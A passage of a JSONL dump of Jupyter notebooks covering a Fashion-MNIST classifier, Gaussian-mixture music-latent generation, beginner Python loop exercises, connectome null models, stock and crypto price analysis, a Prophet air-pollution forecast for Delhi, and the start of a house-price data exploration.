self.fc2 = nn.Linear(256,128)\n #terceira camada oculta tem 64 unidades \n self.fc3 = nn.Linear(128, 64)\n #nossa camada de saída tem 10 unidades \n self.fc4 = nn.Linear(64, 10)\n\n def forward(self, x):\n #certificar que o tensor de entrada está achatado\n x = x.view(x.shape[0], -1)\n\n #ai não precisa achatar no loop de treinamento\n x = F.relu(self.fc1(x))\n x = F.relu(self.fc2(x))\n x = F.relu(self.fc3(x))\n x = F.log_softmax(self.fc4(x), dim = 1)\n\n return x\n\n\nmodel = Classifier()\ncriterion = nn.NLLLoss()\n#Adam optmizer, basicamente o mesmo que a descida gradiente estocástica, mas tem umas propriedades onde usa o momento que acelera o processo de ajuste real \n#ele também ajusta a taxa de aprendizado para cada um dos parametros individuais em seu modelo \noptimizer = torch.optim.Adam(model.parameters(), lr = 0.003)\n\nepocas = 5\nfor e in range(epocas):\n running_loss = 0\n for images, labels in trainloader:\n logps = model(images)\n loss = criterion(logps, labels)\n\n optimizer.zero_grad()\n loss.backward()\n optimizer.step()\n\n running_loss += loss.item()\n else:\n print(f\"Training loss: {running_loss}\")\n\ndataiter = iter(testloader)\nimages, labels = dataiter.next()\nimg = images[1]\n\nps = torch.exp(model(img))\n\nhelper.view_classify(img, ps, version='Fashion')\n","repo_name":"lauraarakakii/first-deep-learning-neural-network--MNIST","sub_path":"Fashion_MNIST.ipynb","file_name":"Fashion_MNIST.ipynb","file_ext":"py","file_size_in_byte":2755,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-jupyter-script","pt":"36"} +{"seq_id":"40959756561","text":"# +\nimport numpy as np\nimport itertools\n\nfrom scipy import linalg\nimport matplotlib.pyplot as plt\n# %matplotlib inline\nimport matplotlib\n\nfrom sklearn import mixture\n\nfrom pathlib import Path\nimport torch\nimport h5py\nimport tqdm\nfrom IPython.display import Audio, display\n\nimport sys\nsys.path += ['../music-translation/src']\n\nimport utils\nimport wavenet_models\nfrom utils import save_audio\nfrom wavenet import WaveNet\nfrom wavenet_generator import WavenetGenerator\nfrom nv_wavenet_generator import NVWavenetGenerator\nfrom nv_wavenet_generator import Impl\n# -\n\nencoded = []\nfor directory in Path('encoded-musicnet/encoded').iterdir():\n for path in directory.iterdir():\n encoded += [torch.load(path)]\nencoded = torch.cat(encoded, dim=0)\nflattened = torch.flatten(encoded, 1)\nflattened = flattened.cpu().numpy()\nprint(flattened.shape)\n\n# +\n#choosing model\n\nlowest_bic = np.infty\nbic = []\nn_components_range = range(1, 10)\ncv_types = ['spherical', 'tied', 'diag', 'full']\nfor cv_type in cv_types:\n for n_components in n_components_range:\n # Fit a Gaussian mixture with EM\n gmm = mixture.GaussianMixture(n_components=n_components,\n covariance_type=cv_type, reg_covar = 1e-4)\n gmm.fit(flattened)\n bic.append(gmm.bic(flattened))\n if bic[-1] < lowest_bic:\n lowest_bic = bic[-1]\n best_gmm = gmm\n# -\n\nprint(best_gmm.get_params())\n\nsamples = []\nfor i in range(4):\n samples += [torch.from_numpy(best_gmm.sample()[0].reshape(1, 64, 200))]\n\n# +\ncheckpoint = Path('../music-translation/checkpoints/pretrained_musicnet/bestmodel')\ndecoders = [0, 1, 2, 3, 4, 5]\nbatch_size = 1\nrate = 16000\nsplit_size = 20\n\n\n\ndef disp(x, decoder_ix):\n wav = utils.inv_mu_law(x.cpu().numpy())\n print(f'Decoder: {decoder_ix}')\n print(f'X min: {x.min()}, max: {x.max()}')\n\n display(Audio(wav.squeeze(), rate=rate))\n \ndef extract_id(path):\n decoder_id = str(path)[:-4].split('_')[-1]\n return int(decoder_id)\n\n\n\nprint('Starting')\nmatplotlib.use('agg')\n\ncheckpoints = checkpoint.parent.glob(checkpoint.name + '_*.pth')\ncheckpoints = [c for c in checkpoints if extract_id(c) in decoders]\nassert len(checkpoints) >= 1, \"No checkpoints found.\"\n\nmodel_args = torch.load(checkpoint.parent / 'args.pth')[0]\n\ndecoders = []\ndecoder_ids = []\nfor checkpoint in checkpoints:\n decoder = WaveNet(model_args)\n decoder.load_state_dict(torch.load(checkpoint)['decoder_state'])\n decoder.eval()\n decoder = decoder.cuda()\n decoder = WavenetGenerator(decoder, batch_size, wav_freq=rate)\n \n decoders += [decoder]\n decoder_ids += [extract_id(checkpoint)]\n\n# +\n#decoding randomly generated vectors\n\nyy = {}\nwith torch.no_grad():\n zz = []\n for vector in samples:\n zz += [vector]\n zz = torch.cat(zz, dim=0).float().cuda()\n print(zz.shape)\n\n with utils.timeit(\"Generation timer\"):\n for i, decoder_id in enumerate(decoder_ids):\n if decoder_id != 3:\n continue\n yy[decoder_id] = []\n decoder = decoders[i]\n for zz_batch in torch.split(zz, batch_size):\n print(zz_batch.shape)\n splits = torch.split(zz_batch, split_size, -1)\n audio_data = []\n decoder.reset()\n for cond in tqdm.tqdm_notebook(splits):\n audio_data += [decoder.generate(cond).cpu()]\n audio_data = torch.cat(audio_data, -1)\n yy[decoder_id] += [audio_data]\n yy[decoder_id] = torch.cat(yy[decoder_id], dim=0)\n# -\n\nfor decoder_ix, decoder_result in yy.items():\n i=0\n for sample_result, sample in zip(decoder_result, samples):\n disp(sample_result, decoder_ix)\n wav = utils.inv_mu_law(sample_result.cpu().numpy())\n \n component = best_gmm.predict(sample.reshape(1,12800))[0]\n print(component)\n save_audio(wav.squeeze(), Path(\"results/gmm\" + str(component) + '-' + str(i) + \"_d\" + str(decoder_ix) + \".wav\"), rate)\n i+=1\n\ncomponents = {}\nfor directory in Path('encoded-musicnet/encoded').iterdir():\n components[directory.name.replace('_', ' ')] = [0, 0, 0, 0, 0, 0]\n for path in directory.iterdir():\n component = best_gmm.predict(torch.flatten(torch.load(path), 1).cpu().numpy())[0]\n components[directory.name.replace('_', ' ')][component] += 1\nprint(components)\n\n# +\nn_components_range = range(1, 7)\n\ncolor_iter = itertools.cycle(['navy', 'turquoise', 'cornflowerblue',\n 'darkorange', 'red', 'green'])\ndistributions = ['component 0', 'component 1', 'component 2', 'component 3', 'component 4', 'component 5']\nbars = []\nkeys = ['Bach Solo Cello', 'Bach Solo Piano', 'Beethoven Accompanied Violin', 'Beethoven Solo Piano', 'Beethoven String Quartet', 'Cambini Wind Quintet']\n\nplt.figure(figsize=(16, 12))\nspl = plt.subplot(2, 1, 1)\nfor i, (component, color) in enumerate(zip(distributions, color_iter)):\n xpos = np.array(n_components_range) + .1 * (i - 2)\n bars.append(plt.bar(xpos, [components[key][i] for key in keys],\n width=.1, color=color))\nplt.xticks(n_components_range, labels = keys)\nplt.title('Component classification per domain')\nspl.set_xlabel('Domains')\nspl.legend(distributions)\n# -\n\nmeans = torch.from_numpy(best_gmm.means_).reshape(-1, 64, 200)\nprint(means)\n\n# +\n#decoding means of gmm components\n\nyy = {}\nwith torch.no_grad():\n zz = means.float().cuda()\n\n with utils.timeit(\"Generation timer\"):\n for i, decoder_id in enumerate(decoder_ids):\n if decoder_id != 3:\n continue\n yy[decoder_id] = []\n decoder = decoders[i]\n for zz_batch in torch.split(zz, batch_size):\n print(zz_batch.shape)\n splits = torch.split(zz_batch, split_size, -1)\n audio_data = []\n decoder.reset()\n for cond in tqdm.tqdm_notebook(splits):\n audio_data += [decoder.generate(cond).cpu()]\n audio_data = torch.cat(audio_data, -1)\n yy[decoder_id] += [audio_data]\n yy[decoder_id] = torch.cat(yy[decoder_id], dim=0)\n# -\n\nfor decoder_ix, decoder_result in yy.items():\n for sample_result, mean in zip(decoder_result, means):\n disp(sample_result, decoder_ix)\n wav = utils.inv_mu_law(sample_result.cpu().numpy())\n \n component = best_gmm.predict(mean.reshape(1,12800))[0]\n print(component)\n save_audio(wav.squeeze(), Path(\"results/gmm-mean\" + str(component) + \"_d\" + str(decoder_ix) + \".wav\"), rate)\n\n\n","repo_name":"18praveenb/orchestrator","sub_path":"latent-vectors/GaussianMixture.ipynb","file_name":"GaussianMixture.ipynb","file_ext":"py","file_size_in_byte":6623,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-jupyter-script","pt":"36"} +{"seq_id":"2342606205","text":"# ## 1.Print the String \"Python\" 10 Times\n\ni=1\nwhile i<=10:\n print(\"Python\")\n i=i+1\n\n# ## 2.write a program to print the number from 1 to 10\n\ni=1\nwhile i<=10:\n print(i)\n i=i+1\n\n# ## 3.write a program to print the sum of first 10 numbers\n\ni=1\nsum=0\nwhile i<=10:\n sum=sum+i\n i=i+1\nprint(sum)\n\n# ## 4.write a program to print n numbers using user input\n\nn=int(input(\"Enter the number \"))\ni=1\nwhile i<=n:\n print(i)\n i+=1\n\n# ## 5.write a program to print the sum of n numbers using user input\n\nn=int(input(\"Enter the number \"))\ni=0\nsum=0\nwhile i<=n:\n sum=sum+i\n i=i+1\nprint(sum)\n\n# ## 6.write a program to print the table\n\nn=int(input(\"Enter the number \"))\nfor i in range(1,11):\n print(n,'*',i,'=',n*i)\n\n# ## 7.write a program to print the Factorial of a number\n\nn=int(input('Enter the number'))\nf=1\nwhile n>0:\n f=f*n\n n=n-1\nprint(f)\n\n# ## 8.write a program to print the even numbers from 2 to 100\n\ni=1\nwhile i<=100:\n if i%2==0:\n print(i)\n i+=1\n\n# ## 9.write a program to print the odd numbers from 1 to 100\n\ni=1\nwhile i<100:\n print(i)\n i+=2\n\n# ## 10.write a program to check whether a given number is palindrome or not\n\nn=int(input())\ntemp=n\nm=str(n)\nl=-1\nstr2=''\nwhile l>=-len(m):\n str2=str2+m[l]\n l=l-1\nstr2=int(str2)\nif str2==temp:\n print(\"Number is a palindrome\")\nelse:\n print(\"Number is not a palindrome\") \n\n# ## 11.write a program to print the factors of a number\n\nn=int(input('Enter a number to find the factors of a number: '))\nfor i in range(1,n+1):\n if n%i==0:\n print(i)\n\n# ## 12.write a program to reverse a number\n\nn=int(input())\ntemp=n\nm=str(n)\nl=-1\nstr2=''\nwhile l>=-len(m):\n str2=str2+m[l]\n l=l-1\nstr2=int(str2)\nprint(str2)\n\n# ## 13.write a program to print the sum of reverse of a number\n\nn=int(input())\ntemp=n\nrev=0\nwhile n!=0:\n digit=n%10\n rev=rev*10+digit\n n=n//10\nrev=str(rev)\nsum=0\nadd=0\nfor i in rev:\n sum=int(i)\n add+=sum\nprint(add)\n\n# ## 14.write a program to check the given number is prime or not\n\n# +\nn=int(input('Enter a number: '))\nif n>1:\n for i in range(2,int(n/2)+1):\n if n%i==0:\n print(\"The Entered number is not a prime number\")\n break\n else:\n print(\"The Entered number is a prime number\")\n\nelse:\n print(\"The Entered number is not a prime number\")\n# -\n\n# ## 15.write a program to print the prime numbers from 1 to 100\n\nfor j in range(1,101):\n count=0\n t=j//2\n for i in range(2,t+1):\n if j%i==0:\n count=count+1\n break\n if count==0 and j>1:\n print(j)\n\n# ## 16.write a program to find the factors of a number\n\nn=int(input(\"Enter the number to find the factors of a number: \"))\nfor i in range(1,n+1):\n if n%i==0:\n print(i)\n\n# ## 17.write a program to check whether a given number is prime or not\n\nn=int(input('Enter a number: '))\nif n>1:\n for i in range(2,n):\n if n%i==0:\n print(\"The Entered number is not a prime number\")\n break\n else:\n print(\"The Entered number is a prime number\")\nelse:\n if n==0 or n==1:\n print(\"The Entered number is not a prime number\")\n else:\n print(\"Please enter the positive number\")\n\n# ## 18.write a program to print prime numbers from 1 to 100\n\n#write a program to print prime numbers from 1 to 100\nfor i in range(1,101):\n if i>1:\n for j in range(2,i):\n if i%j==0:\n break\n else:\n print(i)\n\n# ## 19.write a program to print cube of all the numbers from 1 to given number\n\nn=int(input(\"Enter a number: \"))\nfor x in range(1,n+1):\n print(\"The cube of a number\",x,\"is\",x**3)\n\n# ## 20. write a program to count the total number of digits in a number\n\nn=int(input(\"Enter a number: \"))\ncount=0\nwhile n!=0:\n n//=10\n count+=1\nprint(\"The total number of digits are \",count)\n\n# ## 21.write a program to print the factorial of a number\n\n#Fibonacci series\nn=int(input('Enter the number: '))\nf=1\nwhile n>0:\n f=f*n\n n=n-1\nprint(f)\n\n# ## 22.write a program to print the fibonacci series\n\n#Fibonacci sequence\nt=int(input('Enter the number: '))\nn1,n2=0,1\ncount=0\nif t<=0:\n print(\"Please enter a positive value\")\nelif t==1:\n print(n2)\nelse:\n while count<=t:\n print(n1)\n n=n1+n2\n n1=n2\n n2=n\n count+=1\n\n# ## 23.write a program whether a given number is amstrong or not\n\nn=int(input(\"Enter the number: \"))\ncount=len(str(n))\nsum=0\ntemp=n\nwhile temp>0:\n digit=temp%10\n sum+=digit**count\n temp=temp//10\nif n==sum:\n print(\"The Entered number\",n,\"is an amstrong\")\nelse:\n print(\"The Entered number\",n,\"is not an amstrong\")\n\n# ## 24.write a program whether a given number is strong or not\n\nn=int(input(\"Enter a number: \"))\ntemp=n\ns=0\nwhile n>0:\n fact=1\n digit=n%10\n for i in range(1,digit+1):\n fact=fact*i\n s=s+fact\n n=n//10\nif temp==s:\n print(\"The Entered number\",temp,\"is a strong number\")\nelse:\n print(\"The Entered number\",temp,\"is not a strong number\")\n\n# ## 25. write a program whether a given number is perfect or not\n\nn=int(input(\"Enter a number: \"))\nsum = 0\nfor x in range(1, n):\n if n % x == 0:\n sum += x\nif sum == n:\n print(\"The Entered Number is Perfect Number\")\nelse:\n print(\"The Entered Number is not Perfect Number\")\n\n# ## 26.write a program to print the following number pattern using a loop\n\n'''\na) 1 b) 1 c) 54321 (cone) d) 12345 e) 54321\n 12 22 5432 1234 4321\n 123 333 543 123 321\n 1234 4444 54 12 21\n 12345 55555 5 1 1 \n''' \n\nfor i in range(1,7):\n for j in range(1,i):\n print(j,end=\"\")\n print()\n\nfor i in range(6):\n for j in range(i):\n if i==4 or i==5:\n print(i,end=\"\")\n else:\n print(i,end=\"\")\n print()\n\ni=5\nstr1=''\nwhile i>0:\n str1=str1+str(i)\n i=i-1\nint1 = int(str1)\nwhile int1!=0:\n print(int1)\n int1=int1//10\n\nstr1=''\nfor i in range(1,6):\n str1=str1+str(i)\nint1=int(str1)\nwhile int1!=0:\n print(int1)\n int1=int1//10\n\nj=5 \nwhile j>0:\n i=j\n while i>0:\n print(i,end=\"\")\n i=i-1\n print()\n j=j-1\n\n# ## 27.write a program to print the following number pattern using a loop\n\n'''\n \n a) * b) ***** c) ***** d) ***** e) *\n ** ***** **** **** **\n *** ***** *** *** *** \n **** ***** ** ** ****\n ***** ***** * * *****\n \n '''\n\nfor i in range(7):\n for j in range(1,i):\n print(\"*\",end=\"\")\n print()\n\nfor i in range(5):\n for i in range(5):\n print(\"*\",end=\"\")\n print()\n\ni=5\nj=0\nwhile 0 < i:\n while j < i:\n print(\"*\",end=\"\")\n j=j+1\n print()\n i=i-1\n j=0\n\ni=5\nj=0\nstr1=\"\"\nwhile 0 < i:\n while j < i:\n str1=str1+\"*\"\n j=j+1\n print(str1.rjust(5,\" \"))\n i=i-1\n j=0\n str1=\"\"\n\nstr1=\"\"\nfor i in range(0,6):\n for j in range(0,i):\n str1=str1+\"*\"\n print(str1.rjust(5,\" \"))\n str1=\"\"\n\n# ## 28.write a program to print the following number pattern using a loop\n\n'''\na) A b) A c) ABCDE \n AB BB ABCD \n ABC CCC ABC \n ABCD DDDD AB \n ABCDE EEEEE A \n'''\n\nstr1='ABCDE'\ni=0\nj=0\nwhile i1:\n for i in range(2,num):\n if num%i==0:\n print(\"The Entered number {} is not a prime number\".format(num))\n break\n else:\n print(\"The Entered number {} is a prime number\".format(num))\n \nn=int(input(\"Enter a number: \"))\nprime_checker(n)\n# -\n\n# ## 30. write a number to check whether a given number is perfect number or not\n\nn=int(input(\"Enter a number: \"))\nsum = 0\nfor x in range(1, n):\n if n % x == 0:\n sum += x\nif sum == n:\n print(\"The Entered Number is Perfect Number\")\nelse:\n print(\"The Entered Number is not Perfect Number\")\n\n\n# ## 31. write a function that checks whether a passed string is palindrome or not\n\n# +\ndef palindrome(s):\n temp=s\n str2=''\n for i in s:\n str2 = i+str2\n if str2==temp:\n print(\"The Entered string {} is a palindrome\".format(temp))\n else:\n print(\"The Entered string {} is not a palindrome\".format(temp))\n \nstr1=input(\"Enter a string: \")\npalindrome(str1)\n# -\n\n\n","repo_name":"Shankarraj11/Python-code","sub_path":"Loop/Looping Programs.ipynb","file_name":"Looping Programs.ipynb","file_ext":"py","file_size_in_byte":9159,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-jupyter-script","pt":"36"} +{"seq_id":"20747599752","text":"# +\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nfrom matplotlib import cm\nfrom matplotlib.colors import LogNorm\n\n#from matplotlib import rc, rcParams\nimport copy\nimport os\n\nfrom scipy.integrate import odeint\nfrom HTC_utils import *\n\nimport networkx as nx\nimport igraph as ig\n\nfrom tqdm.auto import tqdm\nfrom numba import jit, prange\n\n# +\nrc = {\"font.family\" : \"DejaVu Serif\", \n \"mathtext.fontset\" : \"dejavuserif\",\n \"xtick.labelsize\": 18,\n \"ytick.labelsize\": 18,\n 'axes.labelsize': 26}\nplt.rcParams.update(rc)\n\n#plt.rcParams[\"font.serif\"] = [\"Times New Roman\"] + plt.rcParams[\"font.serif\"]\n\n# +\nAij = np.loadtxt('connectome.txt')\nW = normalize(Aij)\n\nr1 = 0.1\nr2 = 0.1\n\nTminus = r1 * r2 / (r1 + r2 + r1*r2)\nTplus = r2 / (2*r2 +1)\n\nxplus = Tplus\nyplus = Tplus / r2\n\nxminus = Tminus\nyminus = Tminus / r2\n\nprint(Tminus)\nprint(Tplus)\n# -\n\nplt.figure(figsize=(6,6))\nim = plt.imshow(Aij, norm=LogNorm(vmin=1e-6, vmax=1))\nplt.colorbar(im,fraction=0.046, pad=0.03)\nplt.axis('off')\nplt.show()\n\n# # Null model 1\n# Maslov-Sneppen algorithm: same degree sequence
\n# (*) better than configuration model -> no self-loops or multi-edges\n\n# +\nfolder = 'randomized/'\n\nfor filename in os.listdir(folder):\n if 'npy' in filename:\n if '_1' in filename:\n print(filename)\n Q = np.load(folder+filename)\n\n# +\nplt.figure(figsize=(12,6))\n\nplt.subplot(1,2,1)\nim = plt.imshow(Aij, norm=LogNorm(vmin=1e-6, vmax=1))\nplt.colorbar(im,fraction=0.046, pad=0.03)\nplt.axis('off')\n\nplt.subplot(1,2,2)\nim = plt.imshow(Q, norm=LogNorm(vmin=1e-6, vmax=1))\nplt.colorbar(im,fraction=0.046, pad=0.03)\nplt.axis('off')\n\nplt.show()\n# -\n\nlen(Aij.nonzero()[0]) / 1e4\n\n\n","repo_name":"gbarzon/HTC_oscillations","sub_path":"Null_models.ipynb","file_name":"Null_models.ipynb","file_ext":"py","file_size_in_byte":1682,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-jupyter-script","pt":"36"} +{"seq_id":"28735433702","text":"# 주식 및 코인 가격 분석 연습\n# ===\n\nimport yfinance as yf\nimport pandas as pd\n\ndata = yf.download([\"AAPL\", \"TSLA\", \"AMZN\", \"CPNG\"], start=\"2018-03-31\")\ndata\n\ndata[\"Close\"][\"AAPL\"]\n\naapl = yf.Ticker(\"AAPL\")\n\naapl.dividends #티커 이후 배당\n\naapl.splits #티커 이후 주식 분할\n\naapl.recommendations #티커 이후 애널리스트 평가\n\naapl.info #티커 이후 정보\n\naapl.history(period=\"max\")\n\ncpng = yf.Ticker(\"CPNG\")\n\ncpng.info\n\ncpng.history(\"max\")\n\nresult = cpng.info\ntype(result)\n\npd.Series(result)\n\nimport pyupbit as upbit\n\nupbit.get_tickers(fiat=\"KRW\")\n\nupbit.get_current_price([\"KRW-BTC\", \"KRW-ETH\"])\n\nticker = \"KRW-BTC\"\ninterval = \"day\"\nto = \"2022-01-01 00:00\"\ncount = 100\na = upbit.get_ohlcv(ticker=ticker, interval=interval, to=to, count=1461)\n\nk = pd.DataFrame(a)\nk\n\n_open = k[\"open\"]\n_close = k[\"close\"]\n\nfrom matplotlib import pyplot as plt\n\nplt.plot(_open)\nplt.plot(_close)\nplt.show()\n\ndt = pd.DataFrame(data)\ndt.to_csv(\".\\stock.csv\")\n\nfrom modules import mod_sql # SQL 기본 설정 모듈\n\ndb = mod_sql.Database()\n\n# +\nselect_sql = \"\"\"\n SELECT * FROM stock_trimmed\n \"\"\"\n\nk = db.executeAll(select_sql)\ndf = pd.DataFrame(k)\ndf\n# -\n\nl = []\nfor i in df.columns :\n for j in range(3) :\n if f\"_[{j}]\" in i :\n i = i.replace(f\"_[{j}]\", \"\")\n l.append(i)\nl\n\ndf.columns = l\ndf\n\ndf.columns = df.columns + \"-\" + df.loc[0] + df.loc[1]\ndf\n\ndf.drop(index=[0,1], inplace=True)\ndf\n\ndf.reset_index(drop=True, inplace=True)\ndf\n\ndf.isnull()\n\ndf2 = df.apply(lambda x : x.replace(\"\", None))\ndf2\n\ndf2.to_csv(\".\\stock_trimed.csv\")\n\n# +\nselect_sql = \"\"\"\n SELECT * FROM stock_trimmed\n \"\"\"\n\nk = db.executeAll(select_sql)\ndf = pd.DataFrame(k)\ndf\n# -\n\ndf.drop([\"MyUnknownColumn\"], axis=1, inplace=True)\ndf\n\n\ndf.rename(columns={\"MyUnknownColumn-Date\":\"Date\"}, inplace=True)\ndf\n\ndrop_sql = \"\"\"\n ALTER TABLE stock_trimmed DROP MyUnknownColumn\n \"\"\"\ndb.execute(drop_sql)\n\ncol_rename_sql = \"\"\"\n ALTER TABLE stock_trimmed CHANGE `MyUnknownColumn-Date` Date DATETIME\n \"\"\"\ndb.execute(col_rename_sql)\n\n# +\nselect_sql = \"\"\"\n SELECT * FROM stock_trimmed\n \"\"\"\n\nk = db.executeAll(select_sql)\ndf = pd.DataFrame(k)\ndf\n# -\n\nfor i in df.columns :\n print(i)\n\ndf.iloc[:,1:] = df.iloc[:, 1:].apply(lambda x : round(x,3)) #숫자 인덱싱 iloc\ndf\n\n\ndf[\"Close-TSLA\"] - df[\"Open-TSLA\"]\n\n# +\ncol_l = []\ndef fluc():\n k = []\n \n for i in df.columns :\n for j in df.columns :\n if (i[-4:] == j[-4:]) and (i.startswith(\"Close\") and j.startswith(\"Open\")) :\n k.append(df[i] - df[j])\n col_l.append(f\"Fluc-{i[-4:]}\")\n return k\n\n\nfl = fluc()\nfl2 = pd.DataFrame(fl).T\nfl2.columns = col_l\n\n# -\n\nfl2\n\ncol_l\n\ndf2 = pd.concat([df, fl2], axis=1)\n\ndf2\n\n# +\ncol_l2 = []\ndef fluc_rate():\n k = []\n \n for i in col_l :\n for j in df.columns :\n if (i[-4:] == j[-4:]) and (j.startswith(\"Open\")) :\n k.append((df2[i] / df[j])*100)\n col_l2.append(f\"Fluc_Rate-{i[-4:]}\")\n return k\n\nfr = fluc_rate()\nfr2 = pd.DataFrame(fr).T\nfr2.columns = col_l2\nfr2\n# -\n\ndf3 = pd.concat([df2, fr2], axis=1) #concat함수는 [리스트]로 묶어서, axis -> 결합할 축 방향 설정.\ndf3\n\n# +\nname_list = [\"AAPL\", \"AMZN\", \"CPNG\", \"TSLA\"]\nplt.figure(figsize=(15,15)) #서브플롯 띄우기 전에 피겨 설정\nplt.tight_layout(pad=10, h_pad=10, w_pad=10, rect=(2,2,2,2)) #서브플롯 간 여백 설정\nfor i in range(1, 17) : \n if i < 5 :\n plt.subplot(4,4,i)\n plt.title(f\"Open-{name_list[i-1]}\")\n plt.plot(df3[f\"Open-{name_list[i-1]}\"], f\"C{i-1}\")\n elif 5<= i < 9 :\n plt.subplot(4,4,i)\n plt.title(f\"Close-{name_list[i-5]}\")\n plt.plot(df3[f\"Close-{name_list[i-5]}\"], f\"C{i-5}\")\n elif 9<= i < 13 :\n plt.subplot(4,4,i)\n plt.title(f\"Fluc-{name_list[i-9]}\")\n plt.plot(df3[f\"Fluc-{name_list[i-9]}\"], f\"C{i-9}\")\n elif 13<= i < 17 :\n plt.subplot(4,4,i)\n plt.title(f\"Fluc_Rate-{name_list[i-13]}\")\n plt.plot(df3[f\"Fluc_Rate-{name_list[i-13]}\"], f\"C{i-13}\")\n\nplt.show()\n","repo_name":"umchapter/what_I_have_learnt","sub_path":"Stock_etc_prac/20220321_stock_etc_prac.ipynb","file_name":"20220321_stock_etc_prac.ipynb","file_ext":"py","file_size_in_byte":4259,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-jupyter-script","pt":"36"} +{"seq_id":"33672554695","text":"# + colab={\"base_uri\": \"https://localhost:8080/\"} id=\"W018rz-s7sKh\" outputId=\"5c9e0221-b9de-4ae9-8df6-22a353d7bdf4\"\n# from google.colab import drive\n# drive.mount('/content/drive')\nDATA_DIR = './data'\n\n# + id=\"iLjhUGDmPOef\"\nimport numpy as np\n\n# + id=\"jREb7bp67f89\"\nimport os\nimport pandas as pd\ndata = pd.read_csv(os.path.join(DATA_DIR,'city_day.csv'))\ndelhi_data = data[data['City']=='Delhi']\n\n# + colab={\"base_uri\": \"https://localhost:8080/\"} id=\"KOc3ULQZv0oW\" outputId=\"76d951b1-2253-48b1-e2b2-52a4d070216e\"\nfrom prophet import Prophet\n\n# + colab={\"base_uri\": \"https://localhost:8080/\"} id=\"2ZZSzxi6vGkd\" outputId=\"8f47930e-b066-4a06-e696-e8bd7c23a0e1\"\ndelhi_data['ds'] = pd.to_datetime(delhi_data['Date'])\ndelhi_data['y'] = delhi_data['PM2.5']\n\n# + id=\"qpZ55wK5Jvj4\"\nmask = (delhi_data['Date']>='2018-07-01') & (delhi_data['Date']<'2019-07-01')\ntest, train = delhi_data.loc[mask],delhi_data.loc[delhi_data['Date']<'2019-01-01']\n\n# + colab={\"base_uri\": \"https://localhost:8080/\"} id=\"IUkE_un-OXvz\" outputId=\"2df90146-7dfa-4e4d-d455-9de17c1af4f9\"\nm1 = Prophet(yearly_seasonality=2000)\nm1.fit(delhi_data)\nfcast1 = m1.predict(test)\n\n\n# + colab={\"base_uri\": \"https://localhost:8080/\"} id=\"iEEFOsq2Q9Sb\" outputId=\"b6244168-8829-46d9-9952-c41c742ac59e\"\nfrom sklearn.metrics import mean_squared_error\nmse = mean_squared_error(fcast1['yhat'].to_numpy(),test['y'].to_numpy())\nrmse = np.sqrt(mse)\nrmse\n\n# + colab={\"base_uri\": \"https://localhost:8080/\", \"height\": 441} id=\"Jo-j5PDx2tJX\" outputId=\"d63ed50a-23b7-4147-e2f8-03b870d91953\"\nfrom matplotlib import pyplot\nm1.plot(fcast1)\npyplot.show()\n\n# + colab={\"base_uri\": \"https://localhost:8080/\"} id=\"NxrHNH4AwVnA\" outputId=\"1e13001e-a0e1-4f17-983b-cd62c13b2bc1\"\nm = Prophet()\nm.fit(delhi_data)\n\n# + colab={\"base_uri\": \"https://localhost:8080/\", \"height\": 388} id=\"606aGU2YfZsL\" outputId=\"830b450a-ea09-476d-b853-7243220072af\"\nfrom prophet.plot import plot_yearly\na = plot_yearly(m)\n\n# + colab={\"base_uri\": \"https://localhost:8080/\", \"height\": 206} id=\"DZcaW4XZxDyh\" outputId=\"aead4894-75a5-478a-d705-1c570fa1c785\"\nfuture = m.make_future_dataframe(periods=365)\nforecast = m.predict(future)\nforecast[['ds', 'yhat', 'yhat_lower', 'yhat_upper']].tail()\n\n# + colab={\"base_uri\": \"https://localhost:8080/\", \"height\": 474} id=\"nENew_VKyWBk\" outputId=\"8bd5e9b4-eccf-4829-bd63-a2afcfeb80ec\"\nfig1 = m.plot(forecast)\nax = fig1.gca()\nax.set_title(\"O3 Forecast\")\n\n# + colab={\"base_uri\": \"https://localhost:8080/\"} id=\"0eIdh1P9yZG0\" outputId=\"5ba17c47-e5de-4ecd-9a09-568ec5099bd8\"\nfig2 = m.plot_components(forecast)\n\n# + id=\"6MtIOb16ydS2\"\n\n# -\n\n\n\n\n\n\n","repo_name":"hellomasaya/air-pollution-in-delhi","sub_path":"AQI_Prophet.ipynb","file_name":"AQI_Prophet.ipynb","file_ext":"py","file_size_in_byte":2578,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-jupyter-script","pt":"36"} +{"seq_id":"35255544468","text":"# + id=\"A2WaoJKerAbn\"\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nimport warnings\nwarnings.filterwarnings(\"ignore\")\nimport missingno as msno\n\n# + id=\"SDKiNSXiwAM6\"\ndf=pd.read_csv('house_price.csv')\n\n# + colab={\"base_uri\": \"https://localhost:8080/\", \"height\": 300} id=\"oyf7d0dewYXx\" outputId=\"f2dc79d6-1db5-41dd-f7cf-4a7caeb61e50\"\ndf.head()\n\n# + colab={\"base_uri\": \"https://localhost:8080/\"} id=\"o9CqV4vQwbjO\" outputId=\"01d0546e-3542-4d6f-ac9c-1b81fdf29b73\"\npd.options.display.float_format='{:,.2f} %'.format\nprint((df.isnull().sum()/len(df))*100)\npd.options.display.float_format='{:,.2f}%'.format\n\n# + colab={\"base_uri\": \"https://localhost:8080/\", \"height\": 735} id=\"Eyj1cpsuxiwS\" outputId=\"86ecea71-60c2-4efc-99b8-bfb8cbda25e9\"\nmsno.matrix(df,labels=[df.columns],figsize=(30,16))\n\n# + [markdown] id=\"_zeIJ53VylLY\"\n# MSSubClass Attribute\n\n# + colab={\"base_uri\": \"https://localhost:8080/\", \"height\": 725} id=\"92tUonT2yxvF\" outputId=\"2945cd17-643a-4072-8bb6-bc36e004541b\"\nplt.figure(figsize=(16, 12))\nplt.rcParams['axes.facecolor'] = 'black'\nax1 = plt.subplot(2,2,1)\nsns.histplot(data=df['MSSubClass'],ax=ax1,color='pink')\nax1=plt.title('Histogram')\nax2 = plt.subplot(2,2,2)\nsns.swarmplot(x='MSSubClass',y='SalePrice',data=df,ax=ax2)\nax2=plt.title('Swarmplot')\nax3 = plt.subplot(2,2,3)\nsns.distplot(df['MSSubClass'],kde=True,ax=ax3)\nax3=plt.title('Density Plot')\nax4 = 